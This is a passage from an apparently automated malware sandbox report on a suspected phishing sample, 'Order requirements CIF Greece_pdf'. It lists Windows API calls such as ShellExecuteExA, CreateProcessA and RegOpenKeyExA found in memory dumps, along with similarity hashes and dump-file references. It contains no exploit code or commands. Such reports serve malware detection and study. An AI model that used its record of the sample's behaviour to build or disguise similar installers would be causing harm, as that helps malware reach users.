                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Create
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2289755597-0
                                                                                                                                        • Opcode ID: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                                                                                                        • Instruction ID: 0f1f398a2e861ffee82e275805f4c84720ea89191264ee960a0e3bcb1bee2725
                                                                                                                                        • Opcode Fuzzy Hash: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                                                                                                        • Instruction Fuzzy Hash: DAE0ECB211450ABEEF099F90DC0ADBB371DEB04300F10492EF956E5090E6B9AE30AE75
                                                                                                                                        APIs
                                                                                                                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403290,00000000,00792120,000000FF,00792120,000000FF,000000FF,00000004,00000000), ref: 00405D28
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3934441357-0
                                                                                                                                        • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                        • Instruction ID: 77bff2a1fb4a149192ffadfb645e09873699659932145b723af6e3d7aa9a80e5
                                                                                                                                        • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                        • Instruction Fuzzy Hash: 35E0EC3222065AABDF109E659C04AEB7B6CEF05360F008837FE55F3190D635E9219BA8
                                                                                                                                        APIs
                                                                                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032DA,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405CF9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                        • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                                                                                                        • Instruction ID: 359c21f91a3bba3ce6496bf321611394009143f850dd69016ead32bb33babeaa
                                                                                                                                        • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                                                                                                        • Instruction Fuzzy Hash: 08E0863210011EABCF106E909C08FEB775CEF00350F048433FD15E2040E230E8209BA4
                                                                                                                                        APIs
                                                                                                                                        • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402413
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PrivateProfileString
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1096422788-0
                                                                                                                                        • Opcode ID: b4a7043687678eaf2842448dab2c2e4ba0dbc20ac3a1ee677ae887269f19e7fe
                                                                                                                                        • Instruction ID: ec2b9ed2aa8753cc56e49b6d1f5b0ead50a941972cde74363bc07da0fbfd84e4
                                                                                                                                        • Opcode Fuzzy Hash: b4a7043687678eaf2842448dab2c2e4ba0dbc20ac3a1ee677ae887269f19e7fe
                                                                                                                                        • Instruction Fuzzy Hash: 40E04630904208BAEB006FA08E09EAD3A79EF01710F20003AF9617B0D1E6B89482D72E
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405FE8,?,?,?,?,00000002,: Completed), ref: 00405F7E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Open
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                        • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                                                                                        • Instruction ID: f6689eb4189efde595c0db3434e8a658027b475c8950a5948bd102936423b03e
                                                                                                                                        • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                                                                                        • Instruction Fuzzy Hash: A4D0123210420EBBDF119F90DD05FAB371DEB08314F108426FE16A4091D775D930AB64
                                                                                                                                        APIs
                                                                                                                                        • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                        • Opcode ID: 19daa51e0f4140c20b364a7b1aadfe9bb6fd55095eb541cb7129b1dc5595d207
                                                                                                                                        • Instruction ID: 91fe89217483e075e92c8728b5a4931aee7e8ed68981fb3eb44f78270fd31ef9
                                                                                                                                        • Opcode Fuzzy Hash: 19daa51e0f4140c20b364a7b1aadfe9bb6fd55095eb541cb7129b1dc5595d207
                                                                                                                                        • Instruction Fuzzy Hash: 25D0C232704114DBCB00EFA49B0868E73A1EB00324B30C137E011F21C1D6B8CA059A2D
                                                                                                                                        APIs
                                                                                                                                        • SendMessageA.USER32(00010488,00000000,00000000,00000000), ref: 004041B6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                        • Opcode ID: d4215b7baf76609f405edbe0fa82b00310db822e245eb28315c78f51e7c0a9c8
                                                                                                                                        • Instruction ID: 112480d2ae0494b2a53595d3f997b831fbc8a903dfd304933042e2292820a1e0
                                                                                                                                        • Opcode Fuzzy Hash: d4215b7baf76609f405edbe0fa82b00310db822e245eb28315c78f51e7c0a9c8
                                                                                                                                        • Instruction Fuzzy Hash: 40C09B757447007FDA109B649E49F0777D4A791700F14842DB740F50D1D674D450D65C
                                                                                                                                        APIs
                                                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,0001C3E4), ref: 004032EB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FilePointer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 973152223-0
                                                                                                                                        • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                                                                                        • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                                                                                                        • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                                                                                        • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                                                                                                        APIs
                                                                                                                                        • SendMessageA.USER32(00000028,?,00000001,00403FBD), ref: 0040419B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                        • Opcode ID: 8afc8e775a4383b0d9481be42871f9dd90f51651ac4b72857f61fbe09a3a2cc3
                                                                                                                                        • Instruction ID: 18e6939d06ef43c2e98f2159044487ea81de3fce7c02a663ceb4602929a6bce1
                                                                                                                                        • Opcode Fuzzy Hash: 8afc8e775a4383b0d9481be42871f9dd90f51651ac4b72857f61fbe09a3a2cc3
                                                                                                                                        • Instruction Fuzzy Hash: A2B09235184A00AFDA114B10DE09F457A62E7A4701F008028B240240F0CAB200A5EB09
                                                                                                                                        APIs
                                                                                                                                        • ShellExecuteExA.SHELL32(?,00401F5C,?), ref: 004057C5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExecuteShell
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 587946157-0
                                                                                                                                        • Opcode ID: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
                                                                                                                                        • Instruction ID: 923d99ad9cc7c2cd2e65252a1a37f78a8d30594c4c7a615bb4925eb6a4e84790
                                                                                                                                        • Opcode Fuzzy Hash: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
                                                                                                                                        • Instruction Fuzzy Hash: 27C092B2000200DFE301CF90CB08F067BF8AF54306F028068E184DA060C7788840CB29
                                                                                                                                        APIs
                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00403F56), ref: 00404184
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CallbackDispatcherUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2492992576-0
                                                                                                                                        • Opcode ID: 597d59fe883301d0b5c6155ff6ef4d2bcc35d12bd0c13962cde650b33604b6df
                                                                                                                                        • Instruction ID: da82fd3536d89c96f0dffd23ebfb530c9c189a59b1cea2a2009ac9f088f6e34b
                                                                                                                                        • Opcode Fuzzy Hash: 597d59fe883301d0b5c6155ff6ef4d2bcc35d12bd0c13962cde650b33604b6df
                                                                                                                                        • Instruction Fuzzy Hash: E4A00176444A40AFCA02AF50EF09D0ABB62ABA4701B12897AE295900348B765872EB19
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004051FB: lstrlenA.KERNEL32(subterritories,00000000,00799A22,74DF23A0,?,?,?,?,?,?,?,?,?,00403210,00000000,?), ref: 00405234
                                                                                                                                          • Part of subcall function 004051FB: lstrlenA.KERNEL32(00403210,subterritories,00000000,00799A22,74DF23A0,?,?,?,?,?,?,?,?,?,00403210,00000000), ref: 00405244
                                                                                                                                          • Part of subcall function 004051FB: lstrcatA.KERNEL32(subterritories,00403210,00403210,subterritories,00000000,00799A22,74DF23A0), ref: 00405257
                                                                                                                                          • Part of subcall function 004051FB: SetWindowTextA.USER32(subterritories,subterritories), ref: 00405269
                                                                                                                                          • Part of subcall function 004051FB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040528F
                                                                                                                                          • Part of subcall function 004051FB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052A9
                                                                                                                                          • Part of subcall function 004051FB: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052B7
                                                                                                                                          • Part of subcall function 00405773: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A0D70,Error launching installer), ref: 0040579C
                                                                                                                                          • Part of subcall function 00405773: CloseHandle.KERNEL32(?), ref: 004057A9
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00401FC0
                                                                                                                                          • Part of subcall function 00406552: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F76,?,?,?,?,?,?), ref: 00406563
                                                                                                                                          • Part of subcall function 00406552: GetExitCodeProcess.KERNEL32(?,?), ref: 00406585
                                                                                                                                          • Part of subcall function 00406032: wsprintfA.USER32 ref: 0040603F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
